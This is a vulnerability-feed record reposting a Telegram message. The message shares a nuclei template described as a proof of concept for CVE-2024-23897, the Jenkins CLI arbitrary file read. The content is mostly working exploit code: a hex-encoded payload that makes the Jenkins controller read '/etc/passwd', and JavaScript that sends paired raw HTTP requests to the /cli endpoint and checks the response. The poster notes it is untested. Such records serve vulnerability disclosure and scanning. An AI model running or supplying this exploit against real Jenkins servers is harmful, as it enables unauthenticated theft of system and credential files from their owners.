{"uuid": "79e46fa9-fb53-4738-a6da-4644fb7ff045", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/poxek/3620", "content": "Jenkins nuclei-template\nRCE Arbitrary File Read CVE-2024-23897\n\n\u041f\u043e\u043a\u0430 \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043d\u0435 \u0434\u043e\u0431\u0430\u0432\u0438\u043b\u0438 \u0432 nuclei-template. \u042f \u043d\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u043b \u0435\u0449\u0451. \u041d\u0435 \u043d\u0430 \u0447\u0435\u043c \ud83d\ude22\n\nid: CVE-2024-23897\n\ninfo:\n  name: Jenkins &lt; 2.441 - Arbitrary File Read\n  author: iamnoooob,rootxharsh,pdresearch\n  severity: critical\n  description: |\n    Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.\n  reference:\n    - https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314\n  tags: cve,cve2024,lfi,rce,jenkins\n\nvariables:\n  payload: \"{{hex_decode('0000000e00000c636f6e6e6563742d6e6f64650000000e00000c402f6574632f706173737764000000070200055554462d3800000007010005656e5f41450000000003')}}\"\n\njavascript:\n  - code: |\n      let m = require('nuclei/net');\n      let name=(Host.includes(':') ? Host : Host+\":80\");\n      let conn,conn2;\n      try { conn = m.OpenTLS('tcp', name) } catch { conn=  m.Open('tcp', name)}\n      conn.Send('POST /cli?remoting=false HTTP/1.1\\r\\nHost:'+Host+'\\r\\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\\r\\nSide: download\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nContent-Length: 0\\r\\n\\r\\n');\n      try { conn2 = m.OpenTLS('tcp', name) } catch { conn2=  m.Open('tcp', name)}\n      conn2.Send('POST /cli?remoting=false HTTP/1.1\\r\\nHost:'+Host+'\\r\\nContent-type: application/octet-stream\\r\\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\\r\\nSide: upload\\r\\nConnection: keep-alive\\r\\nContent-Length: 163\\r\\n\\r\\n'+Body)\n      resp = conn.RecvString(1000)\n    args:\n      Body: \"{{payload}}\"\n      Host: \"{{Hostname}}\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(response, \"No such agent \\\"\")'\n\n\ud83c\udf1a @poxek", "creation_timestamp": "2024-01-26T11:17:31.000000Z"}